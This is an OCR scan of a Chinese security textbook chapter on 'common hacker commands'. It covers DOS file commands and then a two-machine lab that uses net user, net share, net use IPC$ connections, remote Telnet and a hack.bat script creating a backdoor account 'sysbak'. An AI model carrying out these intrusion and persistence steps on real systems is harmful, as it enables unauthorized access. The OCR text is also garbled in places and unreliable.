(2) cd 命令 。cd 是 英文 Change Directory( 改 变 目 
录 ) 的 缩写 ,要 进入 一 个 目录 就 需要 使 用 cd 命令 。 其 语 


:MsersNdministrator>ca 


法 格式 如 下 。 
:serss Gl 
cd[< 路 径 >] :Vea users 
chdir [< 路 径 >] :NUsersycd adninistrator 


命令 cd. .用 于 退出 上 一 级 目录 ,如 果 进 入 目录 较 深 ， as 
则 需要 多 次 执行 cd. . 才能 退回 到 根 目录 ,也 可 以 直接 执 ” 肝 
行 命令 cd\ 直 接 返 回 到 根 目 录 , 如 图 1-4 所 示 。 注 意 cd 
Windows 和 cd \Windows 命令 不 同 ,cd Windows 指 进入 
当前 目录 下 的 Windows 子 目录 ,如 果 当 前 没有 该 子 目录 
则 会 出 错 , 而 cd \Windows 指 进入 当前 盘 符 根 目 录 下 的 Windows 子 目录 中 ,前 者 
Windows 目录 称 为 "相对 路 径 ”, 后 者 Windows 目录 称 为 “绝对 路 径 ”。 

(3) md 命令 。 在 DOS 下 建立 新 目录 使 用 md 命令 ,其 语法 格式 如 下 。 

md < 路 径 > 

mkdir < 路 径 > 

其 中 ,一 路 径 二 的 最 后 是 所 建立 的 新 子 目录 名 称 ,路 径 既 可 以 用 相对 路 径 也 可 以 用 绝 
对 路 径 。 假 设 当前 目录 为 C 盘 根 目 录 C:\, 在 当前 根 目录 下 创建 一 个 新 目录 back, 执 行 
命令 md back, 当 前 根 目 录 中 就 多 了 一 个 back 目录 ,如 图 1-5 所 示 。 注 意 ,在 同一 磁盘 的 
同一 目录 中 不 允许 有 同名 的 目录 和 文件 ,但 在 不 同 的 目录 中 , 子 目录 和 文件 名 可 以 相同 。 








图 1-4 cd 命令 应 用 举例 


:Nsers\gDedy 


:nd back 


:Vir 
驱动 器 c 中 的 卷 没有 标签 。 
卷 的 厅 列 号 是 186B-D81E 


19:51 5.782.328 5277982.mp3 

10:58 6-Internet 应 用 

22:15 back 

19:56 R> Cantasia Studio 8.5.8 汉化 版 
11:46 14-291-2B8 drivethelife6_6.4.34.122_setup 


11:47 《<DIR> DTLFolder 

12:87 <DIR> IDE 

11:29 《<DIR> Perflogs 

12:85 《<DIR> Progran Piles 

11:46 <DIR> Progran Piles Cx86> 
22:84 <DIR> SecureCRT 

17:49 <DIR> Users 

12:12 <DIR> Windows 





2 个 文件 28.873.528 字 节 








图 1-5 md 命令 应 用 举例 
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(4) rd 命令。 在 DOS 下 可 以 用 rm 命令 和 rd 命令 删除 目录 和 文件 夹 。 其 语法 格式 
如 下 。 





rm < 路 径 > 

rd < 路 径 > 

rd 命令 只 可 删除 空 文件 夹 ,如 果 该 文件 夹 下 游 其 他 目录 或 文件 存在 , 则 需要 先 删除 
最 深层 的 目录 ,最 后 再 删除 该 目录 。 例 如 使 用 命令 rd backl 删除 当前 目录 中 不 需要 的 
backl 目录 。 注 意 rd 命令 用 于 删除 目录 ,删除 文件 则 用 del 命令 。 

3) 熟练 掌握 黑客 常用 的 文件 操作 命令 

黑客 常用 的 文件 操作 命令 有 copy、type、ren、del 等 ,下 面 进行 详细 介绍 。 

(1) copy 命令 。copy 的 中 文 含义 是 复制 ,可 以 把 磁盘 上 的 文件 复制 到 另外 位 置 ,也 
可 以 把 文件 复制 到 同一 个 路 径 下 ,使 用 一 个 新 的 文件 名 ,文件 内 容 保持 不 变 。 

语法 格式 1: 


copy con: [< 目标 文件 名 >] 


执行 此 命令 后 ,光标 停 在 命令 行 的 下 一 行 等 待 输入 数据 ,每 输入 完 一 行 都 要 按 Enter 
键 换行 , 当 全 部 数据 输入 完毕 , 按 F6 和 Enter 键 , 刚 输入 的 所 有 内 容 就 被 存储 在 指定 的 文 
件 中 ,这 种 方式 一 般 用 于 创建 新 的 文本 文件 。 例 如 在 C 盘 根 目 录 下 使 用 命令 copy con 
1. txt, 创 建 内 容 为 “hi,everyone!1” 的 文本 文件 1. txt, 创 建 方式 如 图 1-6(a) 所 示 。 

语法 格式 2: 


copy < 源 文件 名 > [< 目标 文件 名 >] 


该 命令 将 二 源 文件 名 二 指定 的 一 个 文件 或 一 类 文件 复制 到 [二 目标 文件 名 二 ] 下 , 源 
文件 的 内 容 不 变 。 如 果 和 希望 文件 复制 后 重新 命名 , 则 过 目标 文件 名 二 不 可 省 略 , 且 去 源 文 
件 名 二 不 可 使 用 通配符 x* 等 。 若 把 文件 复制 到 同一 磁盘 的 同一 目录 中 进行 , 则 二 目标 文 
件 名 二 不 可 省 略 , 且 与 二 源 文件 名 二 不 同 。 例 如 使 用 命令 copy * .txt c:\dos 将 当前 目 
录 下 所 有 以 . com 为 扩展 名 的 文件 复制 到 C 盘 dos 目录 中 ,首先 使 用 dir 命令 确定 C 盘 是 
否 有 dos 目录 , 若 没有 则 用 命令 md dos 在 C 盘 下 创造 dos 目录 。 使 用 命令 copy 1. txt 
1. bat 将 当前 目录 下 的 1. txt 文件 改名 为 1. bat 文件 ,保存 在 同一 目录 下 ,如 图 1-6(b) 和 
图 1-6(c) 所 示 。 

语法 格式 3: 

copy < 源 文件 名 1 > + < 源 文件 名 2 >[ + … ] [< 目标 文件 名 >] 

该 命令 只 适应 于 对 文本 文件 或 数据 文件 的 连接 复制 ,对 命令 型 文件 则 无 意义 。 例 如 
使 用 命令 copy 1. txt 十 1. bat 11. txt 可 以 将 1. txt 和 1. bat 两 个 文本 文件 的 内 容 相 连 合并 
成 一 个 新 的 文本 文件 11. txt 文件 ,如 图 1-6(d) 所 示 。 

(2) type 命令 。type 命令 的 作用 是 在 DOS 下 显示 文本 文件 的 内 容 。 其 语法 格式 
如 下 。 


type < 文件 名 全 称 > 








:Windows\system32>cd、\ 


:Veopy con 1.txt 


ee cf 中 的 郑 没 有 标签 。 


于 列 号 是 186B-D81E 
开动 器 。 中 的 兰 没 有 标 答 
人 
cs、 的 目录 


paB8/12/12 19:51 5-782.329 1.mp3 
pe16/08/18 10:54 16 1.txt ~ 





:Dcopy 1.txt+1.bat 11.txt 





xios)cds 









: Veopy 1.txt 斑 -bat 


已 复制 


ne 
ca 的 目录 
Re16/88/18 11:28 16 -bat 


Pee8/12/12 19:51 5,782,328 1.np3 
Rei6/88/19 11:28 16 1.txt ™ 





在 人 文件 。 已 复制 1 个 文件 。 










识 动 颖 中 的 着 没有 标签 
动 器 9 着 没有 标签 。 
要 166B -De1E 


css 的 目录 


pei6/88/18 11:28 16 1.hbat 

Ree8/12/12 19:51 5.782,.328 1.mp3 

Pei6/68/18 11:28 16 tetxt 

Pai6/88/18 11:36 33 Wi |” 
四 » 








































(0) (d) 
图 1-6 copy 命令 应 用 举例 


要 显示 的 文件 名 不 能 使 用 通配符 , 若 文件 很 长 不 能 在 显示 中 自动 停止 , 则 可 以 通过 按 
Pause 键 暂停 来 阅读 屏幕 内 容 。 例 如 ,使 用 命令 type 1. txt 来 显示 当前 目录 下 文件 11. txt 
中 的 内 容 , 如 图 1-7 所 示 。 

(3) ren 命令 。ren 是 rename 的 缩写 ,用 于 给 文件 重 命名 。 其 语法 格式 如 下 。 

ren < 旧 文 件 名 > < 新 文件 名 > 

rename < 旧 文 件 名 > < 新 文件 名 > 

改名 后 原文 件 名 消失 ,新 文件 名 列 于 磁盘 目录 中 ,文件 内 容 不 变 , 旧 文件 名 若 不 存在 
或 新 文件 名 已 存在 均 会 导致 错误 信息 返回 。 例 如 ,可 以 使 用 命令 ren 1. txt lback. txt 将 
当前 目录 下 的 1. txt 改名 为 1back. txt。 

(4) del 命令。 在 DOS 下 删除 文件 用 del 命令 。 其 语法 格式 如 下 。 


del < 文件 名 全 称 > [/P] 


该 命令 将 指定 的 一 个 或 一 类 文件 从 磁盘 目录 中 删除 ,原文 件 所 占用 磁盘 空间 被 释 
放 ,/P 选项 删除 文件 之 前 等 待 用 于 确认 。 如 果 所 删除 文件 不 存在 , 则 系统 提示 file no 








| Co EE 


found。 若 在 文件 名 上 使 用 通配符 * . * 则 会 把 指定 磁盘 的 所 有 文件 全 部 删除 ,系统 为 确 
保 文 件 的 安全 ,会 提示 are you sure(y/n) ,如 果 输 入 n, 则 系统 不 执行 删除 操作 。 例 如 ,使 
用 命令 del 1. bat 删除 磁盘 当前 目录 下 的 1. bat 文件 ,使 用 命令 del * . txt, 删 除 当 前 目录 
中 所 有 扩展 名 是 txt 的 文本 文件 ,如 图 1-8 所 示 。 

















:Vdel 1.bat 


:Vdir 
5 老 没 有 标签 。 
虽 刘 js 昨 人 


19:51 5.782.328 1.np3 

11:57 16 工 .EX 

11:57 33 11.0xt 

18:59 《<DIR> 6-Internet 应 用 

19:56 《<DIR> Cantasia Studio 8.5.9 汉化 版 
:type 1-txt) ~ p 11:21 <DIR> dos 
a 11:46 14.291.2B8 drivethelife6_6.4.34.122_set 
pveryones | 
11:47 《<DIR> DILFolder 
:Dtype 1.bat bp 12:87 <DIR> IDE 
i p 11:28 《<DIR> PerfLogs 
pveryone! p 12:85 <DIR> Progran Piles 

p 11:46 《<DIR> Progran Piles ¢x86) 

:Veype 11.txt lp 22:84 <DIR> SecureCRT 
| 17:49 <DIR> Users 


pveryone! p 12:12 ，_《DIR> Windows 
i 4 个 文件 29.973.577 字 节 
pveryone! 11 个 目录 18.554,372.896 可 用 字 节 


|c: Yael wxE 








图 1-7 type 命令 应 用 举例 图 1-8 del 命 令 应 用 举例 


142 任务 2: 掌握 黑客 常用 的 网 络 命令 
1. 任务 目标 


熟练 掌握 使 用 net 命令 显示 ,修改 、 添 加 或 删除 账户 ,提升 .降低 账户 权限 ,创建 删除 
共享 资源 ,启动 ,停止 Windows 网 络 服务 ,向 网 络 的 其 他 用 户 、 计 算 机 发 送 消息 ,显示 域 列 
表 、 计 算 机 列表 或 指定 计算 机 共享 资源 列表 ,熟练 掌握 使 用 系统 自 带 命令 netstat 命令 查 
看 网 络 连接 情况 ,能 熟练 使 用 tracert 命令 确定 IP 数据 包 访 问 目标 所 通过 的 路 径 , 使 用 
route 命令 查看 添加、 修改 和 删除 路 由 条 目 。 


2. 工作 任务 


(1) 使 用 net 命令 发 动 IPCS$ 攻击。 

(2) 利用 telnet 命令 进行 远程 登录 。 

(3) 利用 计划 管理 程序 at 命令 创建 后 门 账 号 。 

(4) 利用 arp 命令 防范 ARP 攻击 。 

(5) 使 用 netstat 命令 查看 计算 机 是 否 “ 身 处 险 境 ”。 
(6) 利用 tracert 命令 确定 访问 目标 通过 的 路 径 。 











(7) 使 用 route 命令 查看 修改 路 由 条 目 。 
(8) 使 用 nslookup 命令 查询 域名 信息 。 


3. 工作 环境 
两 台 预 装 Windows 7 系统 的 主机 ,通过 网 络 相 连 。 
4. 实施 过 程 


1) 使 用 net 命令 发 动 IPC$ 攻击 

net 命令 功能 强大 ,以 命令 行 方式 执行 ,使 用 它 可 以 轻松 地 管理 本 地 或 远程 计算 机 的 
网 络 环境 以 及 各 种 服务 程序 的 运行 和 配置 。 它 还 包括 多 个 不 同 的 附加 命令 ,通过 这 些 命 
令 可 以 添加 删除 .显示 本 地 组 ,连接 计算 机 或 共享 资源 ,启动 .停止 服务 ,添加 删除 用 户 
账户 ,提升 或 降低 用 户 权 限 等 各 种 重要 功能 。 下 面 就 介绍 net 命令 中 一 些 常用 命令 的 基 
本 功能 。 

(1) net user 命令 。 该 命令 主要 用 来 显示 账户 信息 ,修改 .添加 或 删除 账户 。 下 面 就 
以 创建 一 个 名 为 vip 的 受 限 账户 ,然后 将 其 升级 为 超级 管理 员 账 户 为 例 , 介 绍 net user 命 
令 的 使 用 方法 。 

选择 “开始 ”>“ 所 有 程序 >“ 附件” 一 “命令 提示 符 ”" 命 令 , 打 开 命 令 提 示 符 窗口 。 

@ 创建 一 个 名 为 vip 的 受 限 账户 。 在 命令 提示 符 窗口 中 执行 net user vip 123 /add 
命令 即 可 创建 一 个 名 为 vip、 密 码 为 123 的 受 限 账户 ,如 图 1-9 所 示 。 此 时 打开 计算 机 管 
理 的 本 地 用 户 和 组 即 可 看 到 刚 创 建 的 受 限 账户 ,如 图 1-10 所 示 。 


管理 员 : C:\Windows\systen32\cmd. exe 


:Nsers\Adninistrator net user vip 123 /add 


合作 成 功 完成 。 








本 计算机 管理 








日 前 管理 计算 机 旺 ) 的 内 置 帐户 
任务 计划 程序 ES 供 来 宾 访 问 计算 机 或 访问 域 的 内 














图 1-10 查看 受 限 账号 


@ 如 果 用 户 想 要 将 该 账户 提升 为 管理 员 账 户 .可 以 在 命令 提示 符 窗口 中 执行 net 
localgroup administrators vip /add 命令 ,如 图 1-11 所 示 。 此 时 打开 计算 机 管理 查看 该 账 
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户 的 属性 ,可 看 到 账户 vip 已 经 隶属 管理 员 账 户 组 ,如 图 1-12 所 示 。 


CE 
:sers\Adninistrator mes localgroup administrators vip /add 
成 功 完成 。 


:sers\Adninistrator met localgroup users vip /del 
命令 成 功 完成 。 








图 1-11 提升 和 降低 账号 权限 





图 1-12 查看 账号 属性 


@ 如 果 用 户 想 要 将 该 账户 从 一 般 用 户 组 users 里 删除 ,可 以 在 命令 提示 符 窗 口中 执 
行 net localgroup users vip /del 命令 ,此 时 打开 计算 机 管理 查看 该 账户 的 属性 ,可 看 到 账 
户 vip 仅 隶 属于 管理 员 账 户 组 ,如 图 1-13 所 示 。 











1-13 此 时 账户 vip 仅 隶 属于 管理 员 账 户 组 





[ 项目 1 常用 黑客 命令 的 使 用 ] 用 





@ 如 果 用 户 想 要 将 该 账户 从 超级 用 户 组 Administrators 中 删除 ,可 以 在 命令 提示 符 
窗口 中 执行 net localgroup administrators vip /del 命令 ,此 时 打开 计算 机 管理 查看 该 账 
号 属性 ,可 发 现 账户 vip 已 经 不 属于 Administrators 组 .权利 已 经 降级 。 

@ 如 果 用 户 想 要 删除 刚才 创建 的 账户 ,可 以 在 命令 提示 符 窗口 中 执行 net user vip 
/del 命令 ,此 时 即 可 将 创建 的 账户 vip 删除 。 此 时 打开 计算 机 管理 的 本 地 用 户 和 组 就 看 
不 到 刚 创 建 的 受 限 账户 vip 了 。 

@ 可 以 使 用 net 命令 创建 账户 guolinvip, 并 将 其 添加 到 超级 用 户 组 ,或 者 从 超级 用 
户 组 删除 , 创建 账户 guolintelnet, 并 将 其 添加 到 telnetclients 组 , 创建 账户 
guolindesktop ,并 将 其 添加 到 remote desktop users 组 。 

(2) net share 命令 。 该 命令 的 作用 是 创建 ,删除 共享 资源 。 下 面 就 以 将 本 地 磁盘 C 
设 为 最 多 允许 60 人 访问 的 共享 磁盘 为 例 , 介 绍 net share 命令 的 使 用 方法 。 

中 在 Windows 7 中 , 按 Win 二 R 组 合 键 ,弹出 “运行 "对 话 框 ,输入 cmd, 然 后 单 击 “ 确 
定 ” 按 钮 。 

@ 首先 将 本 地 磁盘 C 共享 ,并 设置 最 大 共享 人 数 为 60 人 。 在 命令 提示 符 窗口 中 执 
行 net share c 一 c: /user:60 命令 , 即 可 将 本 地 磁盘 C 设 为 最 多 允许 60 人 访问 的 共享 磁 
盘 , 如 图 1-14 所 示 。 





图 1-14 共享 C 盘 


@ 在 “我 的 电脑 "窗口 中 右 击 ,从 弹出 的 快捷 菜单 中 选择 “刷新 ”命令 可 以 查看 结果 ， 
在 磁盘 C 图 标 上 有 一 个 “两 人 头像 ”, 如 图 1-15 所 示 。 
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图 1-15 C 盘 共享 后 图 标 发 生变 化 
@ 如 果 想 要 取消 本 地 磁盘 C 的 共享 ,可 以 在 命令 提示 符 窗口 中 执行 net share c /del 
@ 如 果 将 本 次 磁盘 C 设置 为 隐藏 共享 ,在 命令 提示 符 窗口 中 执行 net share c$ 二 c: 


命令 ,如 图 1-16 所 示 , 即 可 将 本 地 磁盘 C 设 为 隐藏 的 共享 磁盘 。 即 在 “我 的 电脑 ”窗口 中 
右 击 ,从 弹出 的 快捷 菜单 中 选择 "刷新 ”命令 也 看 不 到 C 盘 图 标 共享 的 "头像 ”。 
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图 1-16 C 盘 隐藏 共享 


只 有 在 命令 提示 符 窗口 中 执行 net share 命令 , 才 可 以 看 到 隐藏 的 共享 磁盘 C, 如 
图 1-17 所 示 。 





下 -管理 员 : 命令 提示 符 
:sers\Adninistrator’net share 





图 1-17 查看 共享 磁盘 
@ 如 果 想 要 取消 本 地 磁盘 C 的 隐藏 共享 ,可 以 在 命令 提示 符 窗 口中 执行 net share 


c$ /del 命令, 这 时 在 命令 提示 符 下 执行 net share 命令 ,可 以 看 到 磁盘 C 没有 隐藏 共享 
了 ,如 图 1-18 所 示 。 


命令 提示 符 
:Jsers\Adninistrator net share c$ /del 
$ 已 经 删除 。 


:sers\Adninistrator met share 





图 1-18 删除 C 盘 的 隐藏 共享 


(3) net view 命令 。 该 命令 的 作用 是 用 于 显示 域 列表 、 计 算 机 列表 或 指定 计算 机 共 
享 资源 列表 的 命令 。 下 面 就 以 计算 机 A 查询 计算 机 B 共享 资源 列表 为 例 , 假 定 计算 机 A 
的 IP 地址 为 192. 168. 5.2, 计 算 机 B 的 IP 地 址 为 192. 168. 5.1, 介 绍 net view 命令 的 使 


用 方法 。 
@ 在 计算 机 A 的 命令 提示 符 窗口 中 执行 net view 命令 , 即 可 显示 计算 机 A 的 当前 
域 中 的 计算 机 列表 。 


@ 在 计算 机 A 的 命令 提示 符 窗口 中 执行 net view 192. 168. 5. 1 命令 ,查看 计算 机 B 
的 共享 资源 。 如 果 弹 出 错误 提示 “发 生 系统 错误 5, 拒 绝 访问 ”, 如 图 1-19 所 示 。 则 需要 
在 计算 机 A 中 添加 计算 机 B 的 凭据 才能 查看 到 计算 机 B 中 的 共享 资源 。 








rl 命令 提示 符 


: sers\Adn: 


虐 绝 访问 。 





图 1-19 查看 共享 资源 失败 提示 


@ 在 计算 机 A 中 ,选择 “开始 ”>“ 控 制 面板 ”命令 ,在 控制 面板 窗口 中 选择 “用 户 账户 
和 家 庭 安全 ”命令 ,然后 选择 窗口 右 侧 的 “凭据 管理 器 ?下 的 “管理 Windows 凭据 "命令 , 选 
择 “ 添 加 Windows 凭据 ”命令 ,接着 在 对 话 框 中 分 别 输入 计算 机 也 的 IP 地 址 ,用户 名 和 密 
码 , 最 后 单 击 “ 确 定 ” 按 钮 ,如 图 1-20 所 示 。 
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图 1-20 添加 Windows 凭据 


@ 在 计算 机 B 的 命令 提示 符 窗口 中 执行 net share c 一 c: 命 令 , 在 计算 机 A 的 命令 提 
示 符 窗口 中 执行 net view 192. 168. 5. 1 命令 ,查看 计算 机 B 的 共享 资源 如 图 1-21 所 示 。 
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图 1-21 查看 共享 资源 


(4) net use 命令 。 该 命令 主要 用 来 与 远程 计算 机 建立 IPC$ 连接 ,连接 双方 可 以 建 
立 安全 的 通道 并 以 此 通道 进行 加 密 数据 的 交换 ,从 而 实现 对 远程 计算 机 的 访问 。 实 际 上 
往往 被 黑客 用 来 与 远程 主机 实现 通信 和 控制 ,黑客 利用 IPC$ 攻击 建立 ,复制 以 及 删除 远 
程 计算 机 文件 ,在 远程 计算 机 上 执行 命令 等 。 

下 面 假设 黑客 的 本 地 计算 机 A 的 IP 地 址 为 192. 168. 5. 1 ,远程 主机 也 的 IP 地址 为 
192. 168. 5. 2 ,介绍 net use 命令 的 使 用 方法 。 
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OO 在 计算 机 B 的 命令 提示 符 窗口 中 用 net share 命令 确认 C 盘 是 否 已 被 隐藏 共享 ， 
如 图 1-22 所 示 。 如 果 没 有 , 则 使 用 命令 net share c$ 二 c: 设 置 计算 机 B 的 C 盘 隐 藏 共 
享 ,在 计算 机 B 创建 超级 管理 账号 。 


EJ 管理 员 : 命令 提示 符 - net share ipec$ fdel 
:\Jsers\Adninistrator net share 
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图 1-22 在 计算 机 B 中 创建 超级 管理 员 账号 


@ 在 计算 机 A 的 命令 提示 符 窗口 中 ,首先 用 ping 命令 测试 与 计算 机 B 的 连通 性 , 然 
后 输入 net use \\192. 168. 5. 2 与 远程 主机 B 建立 IPC$ 连接 ,根据 提示 需要 输入 计算 机 
B 的 用 户 名 和 密码 ,如 图 1-23 所 示 。 


Eee use \\192.168.5.2 


密码 或 用 户 名 在 \\t92.168-5-2 无 戏 。 
出 +192.168.5.2* 2， 输 信 轩 户 名 : vip 





图 1-23 建立 IPCS$ 连接 


@ 执行 net use f: \\192. 168. 5. 2\c$ ,输入 用 户 名 和 密码 ,映射 网 络 驱动 器 ,将 远程 
主机 也 的 C 盘 映 射 为 本 地 计算 机 A 的 本 地 磁盘 下 ,如 果 发 生 “ 拒 绝 访问 ”的 错误 提示 ,如 
图 1-24 所 示 ,表示 账号 vip 的 权限 不 够 。 


码 在 NM92.168.5.2\e$ 无 效 。 


为 :192.168.5-27 给 入 用 户 名 : vip 
他 全 本 和 -2 提名 
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图 1-24 IPCS$ 连接 错误 提示 


@ 在 计算 机 A 的 命令 提示 符 窗 口中 执行 net use * /del 命令 , 断 开 所 有 IPC$ 连 
接 , 如 图 1-25 所 示 。 

@ 计算 机 A 注销 重启 后 ,在 命令 提示 符 窗口 执行 net use z: \\192. 168. 5. 2\c$ 命 
令 与 远程 主机 B 建立 IPC$ 连接 ,重新 输入 计算 机 B 的 用 户 名 administrator 和 密码 123， 
映射 网 络 驱 动 器 ,将 远程 主机 B 的 C 盘 映 射 为 本 地 计算 机 A 的 本 地 磁盘 Z, 命 令 完成 ,如 
图 1-26 所 示 。 

双击 打开 计算 机 A 桌面 的 “计算 机 ”图 标 ,可 以 看 到 一 个 “网 络 位 置 c $ (\\192. 
168. 5.2)(Z:)”, 如 图 1-27 所 示 。 双 击 打开 , 则 是 计算 机 了 的 C 盘 ,如 图 1-28 所 示 。 
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图 1-26 建立 磁盘 映射 (1) 
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图 1-27 建立 磁盘 映射 (2) 


@ 在 计算 机 A 的 计算 机 桌面 右 击 “ 计 算 机 ”图 标 ,从 弹出 的 快捷 菜单 中 选择 “管理 ” 命 
令 , 打 开 “ 计 算 机 管理 ”窗口 ,在 菜单 栏 中 选择 “操作 ”一 “连接 到 另 一 台 计 算 机 ”命令 ,打开 
“选择 计算 机 ”对 话 框 ,输入 计算 机 B 的 IP 地址 , 单 击 “ 确 定 ” 按 钮 .如 图 1-29 所 示 。 

@ 返回 “计算 机 管理 "窗口, 即 可 在 左 侧 窗 格 中 看 到 新 添加 的 目标 计算 机 名 称 ,在 左 
侧 窗 格 中 单 击 “ 计 算 机 管理 (192. 168. 5.2)” 下 方 “服务 和 应 用 程序 ” 左 侧 的 十 ,出 现 “ 服 务 ” 
选项 , 单 击 “ 服 务 ”" 选 项 ,然后 在 右 侧 “服务 ”列表 窗 格 中 双击 Remote Registry 选项 ,如 
图 1-30 所 示 。 在 弹出 的 “Remote Registry 的 属性 ”对 话 框 中 , 单 击 “ 启 动 ” 按 钮 ,如 图 1-31 
所 示 。 此 服务 可 以 使 远程 用 户 修改 此 计算 机 上 的 注册 表 设 置 。 





rope Files cs6) 
国 winao: 

服用 户 

图 hack 


6 个 对 象 。 脱 机 状态 : 脱 机 
悦 机 可 用 性 : 不 可 用 








1-28 ”打开 远程 计算 机 的 映射 磁盘 


92. 168. 5.2 





图 1-29 输入 目标 计算 机 的 IP 地址 
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图 1-30 选择 Remote Registry 选项 


加 在 右 侧 “服务 "列表 窗 格 中 双击 Telnet 选项 ,如 图 1-32 所 示 。 在 弹出 的 “Telnet 的 
属性 ”对 话 框 中 , 单 击 “ 启 动 ” 按 钮 ,如 图 1-33 所 示 。 

WT 在 计算 机 A 的 命令 提示 符 窗口 中 执行 net use * /del 命令 , 断 开 所 有 IPC $ 连 
接 , 如 图 1-34 所 示 。 

2) 利用 Telnet 命令 进行 远程 登录 

Telnet 是 TCP/IP 协议 簇 中 的 一 员 ,为 用 户 提 供 了 在 本 地 计算 机 上 完成 远程 主机 工 
作 的 能 力 ,使 用 Telnet 协议 进行 远程 登录 需要 满足 以 下 条 件 : 本 地 计算 机 上 必须 装 有 
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图 1-32 选择 Telnet 选项 


包含 Telnet 协议 的 客户 程序 ; @@ 远 程 计算 机 上 必须 装 有 包含 Telnet 协议 的 服务 器 程序 ， 
并 需要 启动 Telnet 服务 ; 图 必须 知道 远程 主机 的 IP 地 址 或 域名 ; @ 必 须知 道 登 录 的 账 
户 名 和 密码 。 因 此 进行 Telnet 远程 登录 的 准备 工作 非常 重要 ,具体 操作 如 下 。 

(1) 配置 本 地 主机 和 远程 主机 的 IP 地 址 ,确保 两 台 计 算 机 能 够 互相 Ping 通 。 假 定 
本 地 计算 机 A 的 IP 地址 为 192. 168. 5. 1 ,远程 计算 机 也 的 IP 地 址 为 192. 168. 5.2。 在 计 
算 机 A 上 选择 “开始 ”所 有 程序 ”附件 "一 “命令 提示 符 ” 命 令 , 打 开 命令 提示 符 窗 
口 。 执 行 ping 192. 168. 5. 2 命令 即 可 查看 来 自 计 算 机 B 的 回复 信息 。 在 计算 机 A 上 安 
装 客 户 端 程序 ,如 图 1-35 所 示 。 

(2) 在 计算 机 B 上 安装 Telnet 协议 的 服务 器 程序 。 选 择 “ 开 始 ”-* 控 制 面板 ”~* 程 
序 和 功能 ”> 打开 或 关闭 Windows 功能 ”命令 ,在 “Windows 功能 ”对 话 框 中 选中 “Telnet 
服务 器 ” 复 选 框 ,然后 单 击 * 确 定 "按钮 ,如 图 1-36 所 示 。 








图 1-33 启动 Telnet 服务 
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图 1-35 在 计算 机 A 上 安装 客户 端 程序 图 1-36 在 计算 机 B 上 安装 服务 器 程序 


(3) 在 计算 机 B 上 启动 Telnet 服务 . 若 出 现 1068 问题 , 则 需要 开启 RPC 服务 和 
Secondary Logon 服务 。 具 体操 作为 : 右 击 计算 机 B 的 “计算 机 ?选择 “管理 ”命令 ,在 * 计 
算 机 管理 ”的 “服务 ”中 找到 Telnet 服务 ,把 Telnet 服务 的 启动 类 型 更 改 为 手动 ,并 单 击 
“启动 ”按钮 ,如 出 现 1068 问题 无 法 正常 启动 , 则 单 击 “依存 关系 ”选项 卡 ,将 Telnet 服务 
依赖 的 两 个 系统 组 件 RPC 和 Secondary Logon 分 别 启动 ,如 图 1-37 所 示 , 从 而 最 后 把 计 
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图 1-37 在 计算 机 B 上 启动 Telnet 服务 


算 机 B 的 Telnet 服务 启动 。 

(4) 在 计算 机 B 上 新 建 账户 guolintelnet, 密 码 123。 并 把 该 账户 添加 到 telnetclients 
组 。 在 计算 机 B 的 命令 提示 符 窗口 中 执行 net user guolintelnet 123 /add 和 net 
localgroup telnetclients guolintelnet /add 命令 ,如 图 1-38 所 示 。 

(5) 在 计算 机 A 上 安装 Telnet 协议 的 客户 程序 。 选 择 “ 开 始 ”“ 控 制 面板 ”>“ 程 序 
和 功能 ”一 “打开 或 关闭 Windows 功能 "命令 ,在 "Windows 功能 ”对 话 框 中 选择 “Telnet 
客户 端 " 复 选 框 ,然后 单 击 “ 确 定 ” 按 钮 ,如 图 1-36 所 示 。 

(6) 从 计算 机 A 远程 登录 到 计算 机 B 上 。 在 计算 机 A 的 命令 提示 符 窗 口中 执行 
telnet 192. 168. 5. 2 命令 ,弹出 是 否 发 送 密码 信息 的 提示 框 ,输入 n。 在 login: 后 输入 计 
算 机 B 的 账号 guolintelnet, 按 Enter 键 。 在 password: 后 输入 密码 123 ,然后 按 Enter 键 。 











图 1-38 在 计算 机 B 上 创建 远程 登录 账号 


通常 密码 123 不 会 在 屏幕 上 显示 ,但 输入 正确 后 ,会 出 现 远 程 登录 计算 机 B 的 对 话 框 ,如 
图 1-39 所 示 ,接着 即 可 使 用 DOS 命令 进行 操作 。 








图 1-39 从 计算 机 A 远程 登录 到 计算 机 B 上 
3) 利用 计划 管理 程序 at 命令 创建 后 门 账 号 
下 面 假设 黑客 的 本 地 计算 机 的 IP 地 址 为 192. 168. 5. 1 ,远程 主 机 的 IP 地 址 为 
192. 168. 5. 2 ,介绍 利用 at 命令 在 目标 主机 创建 后 门 账号 的 方法 。 
(1) 在 本 地 计算 机 打开 记事 本 ,输入 net user sysbak 123 /add 和 net localgroup 
telnetclients sysbak /add, 如 图 1-40 所 示 ,把 该 文件 保存 为 hack. bat, 存 放 在 C 盘 根 目录 


TY 








文件 四 下 格式 加 ) 查看 VW 帮助 00 _ | 
t user sysbak 123 /add 
et localgroup telnetclients sysbak /add 







图 1-40 建立 批 处 理 文件 hack. bat 


(2) 本 地 计算 机 与 目标 主机 建立 IPC$ 连 接 。 在 本 地 计算 机 的 命令 提示 符 窗口 中 执 


令 提示 多 
行 net use \\192. 168. 5. 2 命令 ,根据 提示 需要 输入 计算 机 B 的 用 户 名 administrator 和 密 
码 123 ,与 远程 主机 192. 168. 5. 2 建立 IPC$ 连接 ,如 图 1-41 所 示 。 


NJsers\Adninistrator net use N92-168.5.2 
码 或 用户 儿 在 NM92.168-5-2 无 


+192.168.5.2" 人 记名: adninistrator 





图 1-41 建立 IPC$ 连接 
(3) 在 本 地 计算 机 的 计算 机 桌面 右 击 “ 计 算 机 ”图 标 ,从 弹出 的 快捷 菜单 中 选择 “ 管 
理 ” 命 令 , 打 开 “ 计 算 机 管理 ”窗口 ,在 菜单 栏 中 选择 “操作 ”一 “连接 到 另 一 台 计 算 机 ”命令 ， 
打开 “选择 计算 机 ”对 话 框 ,输入 远程 计算 机 的 IP 地 址 192. 168. 5. 2 , 单 击 “ 确 定 ” 按 锂 


(4) 返回 “计算 机 管理 "窗口 , 即 可 在 左 侧 窗 格 中 看 到 新 添加 的 目标 计算 机 名 称 ,在 左 





[ 项目 1 常用 黑客 命令 的 使 用 ] @ 





侧 窗 格 中 单 击 “ 计 算 机 管理 (192. 168. 5. 2)” 下 方 “ 服 务 和 应 用 程序 ? 左 侧 的 十 ,出现 “服务 ” 
选项 , 单 击 “ 服 务 ” 选 项 ,然后 在 右 侧 “ 服 务 ” 列 表 窗 格 中 双击 Telnet 选项 ,如 图 1-32 所 示 。 
在 弹出 的 属性 对 话 框 中 , 单 击 * 启 动 ”按钮 。 

